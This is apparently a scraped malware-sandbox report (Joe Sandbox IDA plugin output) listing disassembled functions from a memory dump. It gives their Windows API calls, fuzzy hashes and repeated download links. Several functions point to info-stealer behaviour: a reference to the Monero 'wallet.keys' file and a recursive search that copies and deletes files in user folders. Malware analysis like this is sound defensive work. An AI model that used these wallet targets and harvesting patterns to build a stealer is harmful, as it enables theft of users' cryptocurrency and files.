Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 844a4912706c4f51d9706d38916c73320c66c6bb40145a0235396a8fbc239b22
Instruction ID: d29f2aad3b960deac2d64948ee57e7a3f0a5ac0e44be768bd93747a2864e0e24
Opcode Fuzzy Hash: 844a4912706c4f51d9706d38916c73320c66c6bb40145a0235396a8fbc239b22
Instruction Fuzzy Hash: 3A91F471A10148ABDF14FBA0DCA5EEE7378AF55300F404169F507A6593EF346A49CB72

Function 000AB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

lstrlen.KERNEL32(00000000), ref: 000AB42E
lstrlen.KERNEL32(00000000), ref: 000AB442

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: b0022854df2bff09c3cfbf50552314c4e67db02a6571c7fb177b2a44db2ff120
Instruction ID: e3c05b653f33423a7b60106adf75013beac5b6ce160a7a8f766ea5ba045c22fc
Opcode Fuzzy Hash: b0022854df2bff09c3cfbf50552314c4e67db02a6571c7fb177b2a44db2ff120
Instruction Fuzzy Hash: EA710271A10108ABDF14FBA0DCA6DEE737DBF56300F404569F506A6593EF346A09CBA2

Function 000B4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

lstrcat.KERNEL32(?,00000000), ref: 000B4BEA
lstrcat.KERNEL32(?,0139E5B8), ref: 000B4C08

Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B492C
Part of subcall function 000B4910: FindFirstFileA.KERNEL32(?,?), ref: 000B4943

Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C0FDC), ref: 000B4971
Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C0FE0), ref: 000B4987
Part of subcall function 000B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000B4B7D
Part of subcall function 000B4910: FindClose.KERNEL32(000000FF), ref: 000B4B92

Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B49B0
Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C08D2), ref: 000B49C5
Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B49E2
Part of subcall function 000B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 000B4A1E
Part of subcall function 000B4910: lstrcat.KERNEL32(?,0139F600), ref: 000B4A4A
Part of subcall function 000B4910: lstrcat.KERNEL32(?,000C0FF8), ref: 000B4A5C
Part of subcall function 000B4910: lstrcat.KERNEL32(?,?), ref: 000B4A70
Part of subcall function 000B4910: lstrcat.KERNEL32(?,000C0FFC), ref: 000B4A82
Part of subcall function 000B4910: lstrcat.KERNEL32(?,?), ref: 000B4A96
Part of subcall function 000B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 000B4AAC
Part of subcall function 000B4910: DeleteFileA.KERNEL32(?), ref: 000B4B31

Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B4A07

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 605ca1eea3b2a9b250e7548d1e9f9c1766fe314b4f646835c9b6c5c1c3c7b837
Instruction ID: 3173f138d47ea0edeebac3404883476338e9832eb40e9dad48b2b27781f0294a
Opcode Fuzzy Hash: 605ca1eea3b2a9b250e7548d1e9f9c1766fe314b4f646835c9b6c5c1c3c7b837
Instruction Fuzzy Hash: 2741A8BB940204ABD754F7B0FC86EEE337DA795700F00854CB6495A187ED756B8C8BA2

Function 000A6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 000A6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000A6753

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f7e6a0a79c4421824f12f9c603972d2415454f490b5012d7de0c2ed03f79c61e
Instruction ID: 7a07534b8c182bf93573c896eb0c8223f2db4215e9166815186128a75c0b69a0
Opcode Fuzzy Hash: f7e6a0a79c4421824f12f9c603972d2415454f490b5012d7de0c2ed03f79c61e
Instruction Fuzzy Hash: 9541AC74A00209EFCB54CF98C494BADBBB1FF48314F248699E9599B355D732EA81CF84

Function 000B5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

lstrcat.KERNEL32(?,00000000), ref: 000B508A
lstrcat.KERNEL32(?,0139EC88), ref: 000B50A8

Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B492C
Part of subcall function 000B4910: FindFirstFileA.KERNEL32(?,?), ref: 000B4943

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: b4116373cb1f11ce14a0eff92f635c74af445237b2e3a220ebc1ff1f9645d6ba
Instruction ID: d86eb0654a3c1be0f46e8240fa74c0a97fde0297c7e9b7f77ae5c07b23a7ff99
Opcode Fuzzy Hash: b4116373cb1f11ce14a0eff92f635c74af445237b2e3a220ebc1ff1f9645d6ba
Instruction Fuzzy Hash: C701B276940108A7DB54F770EC87DDD737C9B54300F004558B6495A192EE70A7C8CBD3

Function 000A10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000A10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000A10F7

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: e30ce50ea6763b71c1817b9faa6402b5ba40af1fdb160b91d48c18bd3afe6b67
Instruction ID: fc457cccc033cd55036e6f9e65891f0beeb3639a1707a8c1f142cb70b10a6a6a
Opcode Fuzzy Hash: e30ce50ea6763b71c1817b9faa6402b5ba40af1fdb160b91d48c18bd3afe6b67
Instruction Fuzzy Hash: 7DF0E271681208BBEB14DAA8AC89FEEB7ECE705B15F300448F504E7280D571AE00CAA0

Function 000B8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,000A1B54,?,?,000C564C,?,?,000C0E1F), ref: 000B8D9F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 13acb7cf19f4c2c50e2bd51e5524a53f1a01a186fd125579781e3ba9bde28f74
Instruction ID: 3c8c5d2f797a54f9204d3e962842dc0ec49b0638bd7c41bf61807e87a4401587
Opcode Fuzzy Hash: 13acb7cf19f4c2c50e2bd51e5524a53f1a01a186fd125579781e3ba9bde28f74
Instruction Fuzzy Hash: 58F0A570D0020CEBCB14EFA4D5596DCBB78EB11310F10819AE8666B6D1DB746A59DF81

Function 000B8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

